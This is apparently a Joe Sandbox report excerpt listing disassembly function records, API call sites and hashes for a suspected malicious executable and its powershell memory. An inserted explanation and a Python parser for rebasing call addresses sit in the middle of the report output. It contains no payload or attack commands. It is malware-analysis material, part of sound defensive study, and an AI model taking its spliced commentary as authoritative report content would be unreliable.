                                                                                                                        • Instruction Fuzzy Hash: 0831527263968191E624FB15E8617EBA364FB88B84FC14036EA8D076ADDF3CD345CB50
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6733BD1
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastMessageModuleName
                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                        • API String ID: 2581892565-1977442011
                                                                                                                        • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction ID: 62a6f9810cd1372a3b3e7a33e0deac1303f6ec85fe4f31ac37e7cbee09983d67
                                                                                                                        • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction Fuzzy Hash: 59017121B3E64280FA25B720EC363B79251AF5CB84FC21131D94E866A6EE5CE5458620
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718003287-0
                                                                                                                        • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction ID: 8de88a1d6e9d794fc057bfac79645af268bbfba137fef6a5024abe3c0ebf9d3b
                                                                                                                        • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction Fuzzy Hash: FAD12372B2AA8089E711DF75C8982AD77B1FB48F98F814275CE4D57BA9DE38D406C310
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2780335769-0
                                                                                                                        • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                                                                                        • Instruction ID: cfe0db078f3be9395abdb6d9927c61b9a8a106b68e73939dcb95e28b1ca7b5a4
                                                                                                                        • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                                                                                        • Instruction Fuzzy Hash: 6851A222E2565189FB10EF60D86837E73A5EB4CB98F524134DE0E476A9DF38D4419360
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1956198572-0
                                                                                                                        • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction ID: 68591607e6230edff6fe4d72b08be3855edc5b8599ff366e06f3d8e5ce5c5ffa
                                                                                                                        • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction Fuzzy Hash: B611EC21E3914341F654A769ED642BBA352EF8DF80FC59030E94906BADCE2CD8C54510
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                        • Opcode ID: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction ID: 1714ae76598f98d51f777c74db8c979bba07488f1869dc36a15025cd87919f93
                                                                                                                        • Opcode Fuzzy Hash: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction Fuzzy Hash: 88411712A2939245FB60AB259C2537BA7A0EF88FA4F954235EF5C07AFDDE3CD4418710
                                                                                                                        APIs
                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A6747E9E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7A673B105), ref: 00007FF7A6747EBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                        • String ID: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                        • API String ID: 3580290477-3130841589
                                                                                                                        • Opcode ID: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction ID: 02e28a836de43f07def23f23ec2249b09c5de4d036f767046236a3b52fddb5d3
                                                                                                                        • Opcode Fuzzy Hash: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction Fuzzy Hash: 5B417532A2AB5285E715EF259CA90FEA394EB4CF84B964035E90E437A5DF3CD4428760
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                        • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction ID: f21d2be5593afd600457076ded09f1a10c3b1e3417ebb65cf6d1b9908a330a22
                                                                                                                        • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction Fuzzy Hash: 8041B462639A4186DB20EF65E8583AAB761FB88B84F814031EE4D87768EF3CD441C750
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                        • Opcode ID: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction ID: afb14a2ca880b41891211c45a380e1bc505af793a2830bc76cf56b3644ec5ddc
                                                                                                                        • Opcode Fuzzy Hash: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction Fuzzy Hash: B521C362A2964181EB20AB15DC6C27EF3A1FB8CF44FC68035D68D03694EF7CE585C761
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Fatal error detected
                                                                                                                        • API String ID: 1878133881-4025702859
                                                                                                                        • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction ID: 78d790e0066c0ef87a1f40935cd2e3b8141237eaf3f44cfb3c3b7cc64f844447
                                                                                                                        • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction Fuzzy Hash: 3621A77263D68191E724EB51F8617EBA354FB88B88FC14135EA8D07669DF3CD205C750
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Error detected
                                                                                                                        • API String ID: 1878133881-3513342764
                                                                                                                        • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction ID: 153d999c106b5e804a5fcbbd959cca6a20fe4a70486c20caee0b218e0714709a
                                                                                                                        • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction Fuzzy Hash: DC21777263968191E724EB10F8617EBB354FB88B88FC15135EA8D47669DF3CD205C750
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                        • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction ID: 43d72c1381a4b80621019ebd0712dd1db888edf61f0ef760237294eacd75cc3f
                                                                                                                        • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction Fuzzy Hash: AF115132629B8182EB659F15F85026AB7A4FB88F94F994231EF8C07768DF3DD551CB00
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                        • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction ID: 393aaa7b6f81502a73771b35e1a9c19dffcb8af2cfe3c03454dab9f695e06b0e
                                                                                                                        • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction Fuzzy Hash: 2E01712193920285FB21BF60987A27BA3A0EF8CF48FC61035D54D426B5DE2CD5449A24
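The blocks above are the Joe Sandbox IDA plugin's per-function records for the sample (process 0, module base 00007FF7A6730000) and for a powershell memory region (process 2). Each quotes the dump the code was lifted from, the base the dump was taken at ("Offset"), an API/string ID pair, two fuzzy hashes, and, where the function calls out, the call sites with their virtual addresses and the callee chain ("Part of subcall function ..."). The MessageBox wrappers carrying "Fatal error detected" and "Error detected" are the bootloader's error dialogs of the PyInstaller the report flags, and the GetModuleFileNameW / DriveType / CurrentDirectory functions are CRT and bootloader housekeeping rather than payload logic. To carry these addresses into a disassembler you rebase each "ref" against the block's Offset to get an image RVA, and you skip blocks whose dump is "based on PE: false" (the powershell regions), because there is no image to rebase against. The parser below is an added example, not the report's or Joe Security's code; SAMPLE is a constructed two-block excerpt in the layout of the blocks above with the hashes shortened, and the trailing "Download File" link label that the page glues to the dump names is stripped as an artifact.

```python
"""Parse Joe Sandbox "IDA Plugin" function blocks and rebase their call sites.
Added example, not code from the Joe Sandbox report; SAMPLE is a constructed
two-block excerpt in the report's layout, with hashes shortened."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• Opcode ID: c6b54485bead06bc
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A6747E9E
  • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42), ref: 00007FF7A6749E2E
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7A673B105), ref: 00007FF7A6747EBC
Strings
Memory Dump Source
• Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
Similarity
• API ID:
• Opcode ID: cb8a847bc9046c7d
APIs
Strings
"""

HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "APIs", "Strings"}
SOURCE_RE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
# "Name.MODULE(args), ref: VA" or "Name.MODULE ref: VA", optionally prefixed by the subcall note.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w$]+\.\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class ApiRef:
    name: str                    # e.g. "GetModuleFileNameW.KERNEL32"
    ref: int                     # call-site VA as dumped
    rva: int                     # ref rebased against the block's Offset
    subcall_of: int | None = None  # callee VA when the call sits inside a subcall


@dataclass
class FunctionBlock:
    source_file: str
    offset: int                  # base the dump was taken at
    based_on_pe: bool            # False: non-image memory, an RVA means nothing
    fields: dict = field(default_factory=dict)  # Snapshot File, API ID, Opcode ID, ...
    apis: list = field(default_factory=list)


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        item = line[1:].strip().removesuffix("Download File")  # drop the page's link label
        if section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:  # "Associated:" lines list extra dumps, not the block's own source
                blocks.append(FunctionBlock(m["file"], int(m["off"], 16), m["pe"] == "true"))
            continue
        if not blocks:
            continue
        block = blocks[-1]
        if section in ("Joe Sandbox IDA Plugin", "Similarity"):
            key, _, value = item.partition(":")
            block.fields[key.strip()] = value.strip()
        elif section == "APIs":
            m = API_RE.match(item)
            if m:
                ref = int(m["ref"], 16)
                sub = int(m["sub"], 16) if m["sub"] else None
                block.apis.append(ApiRef(m["name"], ref, ref - block.offset, sub))
    return blocks


def rva_map(blocks: list[FunctionBlock]) -> dict[str, list[int]]:
    """API name -> sorted image RVAs of its call sites; PE-backed dumps only."""
    out: dict[str, set[int]] = {}
    for b in blocks:
        if not b.based_on_pe:
            continue
        for a in b.apis:
            out.setdefault(a.name, set()).add(a.rva)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for name, rvas in rva_map(parse_blocks(SAMPLE)).items():
        print(f"{name:<40} {[hex(r) for r in rvas]}")
```

Running it on the full report text instead of SAMPLE gives one RVA list per imported API; loading the unpacked sample in IDA at the same image base and jumping to those RVAs lands on the call sites the sandbox saw executed, which is the quickest way to separate the bootloader and CRT functions listed above from anything worth reversing. Blocks from the powershell dumps come back with an empty RVA map on purpose.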
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb8a847bc9046c7d596628dcc8038eb85789aae599a46734f4cf27aee7337d82
                                                                                                                        • Instruction ID: fb1a9fe7f856cfed62fd79e8f4894871a7ca856c77f88ab28339b1d8a2a170b8
                                                                                                                        • Opcode Fuzzy Hash: cb8a847bc9046c7d596628dcc8038eb85789aae599a46734f4cf27aee7337d82
                                                                                                                        • Instruction Fuzzy Hash: 5D213A7191E7C94FD7539B7448244A57FB0AF13210B0A42DBD4C4CB0F3DA685D49CB62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82861eec54d6c18d872e06421fdb97cd30f05d084df316ccf3f49278872e78a8
                                                                                                                        • Instruction ID: 34068fa72a0606bb968fef2f25701c01d4130b51610a1a2e0bbb530bd40deab2
                                                                                                                        • Opcode Fuzzy Hash: 82861eec54d6c18d872e06421fdb97cd30f05d084df316ccf3f49278872e78a8
                                                                                                                        • Instruction Fuzzy Hash: 8F412A3191DB8C4FD718EB6898566B97BE0FF59710F00426FD089C32A2DA647846CBC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1851808618.00007FFD9B3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b3b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8f41c1d796674ccf0fdb3a3d89f99ed95497ca47b29f7a6d2ab2becbeb69f2f
                                                                                                                        • Instruction ID: f15ec787e956c344bf982d61e47d2d721b591a176ccd1dd04968d962d5fd4f5b
                                                                                                                        • Opcode Fuzzy Hash: a8f41c1d796674ccf0fdb3a3d89f99ed95497ca47b29f7a6d2ab2becbeb69f2f
                                                                                                                        • Instruction Fuzzy Hash: 9C31E63191CB8C8FDB18EF5C9C1A6A97BE0FB59720F00426FE449C3252DA75A855CBC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1850244100.00007FFD9B29D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B29D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b29d000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6730bf3e04dc16e60f71d2bc399d6e6b573047e2fd219791f62d8e699c01fecb
                                                                                                                        • Instruction ID: 518f0911124910d1c26371917dedf2df3098a1a832c56a9bbfe28953e05dfb93
